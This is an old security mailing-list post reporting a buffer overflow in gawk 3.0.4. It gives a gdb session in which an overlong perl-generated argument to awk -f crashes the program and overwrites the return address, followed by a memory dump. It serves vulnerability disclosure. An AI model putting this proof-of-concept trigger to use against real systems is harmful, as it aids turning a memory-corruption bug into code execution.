RE: Buffer overflow in awk

["dong-h0un U" <xploit () hackermail com>]

 This puts last 'NULL byte' and change rule of program.
 Pico editer or snmpd did exploit by similar method.

 [x82@xpl017elz x82]$ gdb -q awk
 (no debugging symbols found)...(gdb) r -f `perl -e 'print "\x82" x 8173'; printf 
 "\xb0\xba\x82\x82"`
 Starting program: /bin/awk -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x
 82\x82"`
 
 Program received signal SIGSEGV, Segmentation fault.
 0x8282bab0 in ?? ()
 (gdb) q
 The program is running.  Exit anyway? (y or n) y   
 [x82@xpl017elz x82]$ rpm -qa | grep awk
 gawk-3.0.4-1
 [x82@xpl017elz x82]$

 debugging: 

 (gdb)
 ...
 0xbfffd2b0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2c0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2d0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2e0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2f0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd300:     0x82828282      0x8282bab0      0xbfffd300      0x080538cc
                                                         ~~ <- it's
 0xbfffd310:     0xbfffdd46      0xbfffd390      0x080577e6      0xbfffdd46
 0xbfffd320:     0xfffffffa      0x00000000      0x00000000      0x00000000
 (gdb) x 0xbfffd304
 0xbfffd304:     0x8282bab0
 (gdb)

 fun! 
 Sorry, I do not English. :-X

 --
 by "you dong-hun"(Xpl017Elz), <szoahc () hotmail com>. 


-- 

Powered by Outblaze